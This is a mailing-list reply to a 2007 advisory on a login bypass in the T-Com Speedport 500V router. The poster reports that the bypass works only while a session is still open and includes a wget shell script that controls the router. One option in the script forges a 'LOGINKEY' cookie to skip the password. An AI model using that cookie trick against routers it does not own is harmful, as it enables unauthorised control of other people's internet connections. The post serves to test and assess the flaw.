Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass

[kissme () wolke7 net]

Hi,

I tried to use the security hole to speed up my control script for the
Speedport 500V Firmware 1.31 under Linux. Goal was to spare the login
request, which takes lots of seconds. But it does not work as expected.
The router remembers the login state. Access without password can only
be gained when the router (correctly) thinks I would still be logged in
from a previous session.

Thus, it seems to me that the security hole is less dangerous - just
always logout from the router. But I don't know whether all remote
control programs perform such logouts, and I did not try to access the
router from different computers, so I don't know whether the router
remembers _which_ computer is logged in.

If you want to reproduce my effects, do the following:

Save the script below to a file named Speedport500V.sh. Edit it and set
correct ADDR and set DO_LOGIN_LOGOUT=0 (thereby the password is not
required).

Now open a browser and login to the router.

Then, in a shell, say:
  ./Speedport500V.sh status

The output should be 'connected' or 'disconnected' depending on the
connection state. If the output is 'unknown' something went wrong.

Now do one of the following:
 - Go back to the browser on logout from the router.
 - Wait for a long time (session time-out).
 - Switch the router off and on.

Then try the above command again. It should say 'unknown' now, which
means that the access without password has been denied.

Now edit the script again, set correct PASSWORD and set
DO_LOGIN_LOGOUT=1. The script should work always now. Open a browser
and login to the router. Call the script once. Now try to navigate in
the open browser session - it will ask for the password, because the
script call has closed the session.


Here comes the script:

#!/bin/sh

ADDR="192.168.2.1"
PASSWORD="0000"
DO_LOGIN_LOGOUT=1

if (( $# != 1 )) ; then
  echo "Usage: $0 connect|disconnect|status"
  exit 1
fi

MY_PID=$$
COOKIE_FILE="/tmp/Speedport500V.cookie.$MY_PID"
STATUS_FILE="/tmp/Speedport500V.status.$MY_PID"

# Login
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --save-cookies "$COOKIE_FILE"\
    --keep-session-cookies\
    -O /dev/null \
    --post-data "P1=$PASSWORD"\
    "http://$ADDR/start.login";
else
  echo -e "$ADDR\tFALSE\t/\tFALSE\t0\tLOGINKEY\tTECOM" > "$COOKIE_FILE"
fi

# Request
case "$1" in
  (connect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=1";
  ;;
  (disconnect)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O /dev/null \
      "http://$ADDR/pppctl.cmd?action=0";
  ;;
  (status)
    wget \
      -q \
      --load-cookies "$COOKIE_FILE"\
      -O "$STATUS_FILE" \
      "http://$ADDR/hcti_statoview.htm";
    if grep -q "var wan_status = 'Getrennt';" "$STATUS_FILE" ; then
      echo disconnected
    elif grep -q "var wan_status = 'Verbunden';" "$STATUS_FILE" ; then
      echo connected
    else
      echo unknown
    fi
    rm "$STATUS_FILE"
  ;;
  (*)
    echo "ERROR: illegal argument"
  ;;
esac

# Logout
if [[ "$DO_LOGIN_LOGOUT" == "1" ]] ; then
  wget \
    -q \
    --load-cookies "$COOKIE_FILE"\
    -O /dev/null \
    "http://$ADDR/logout.cmd";
fi
rm "$COOKIE_FILE"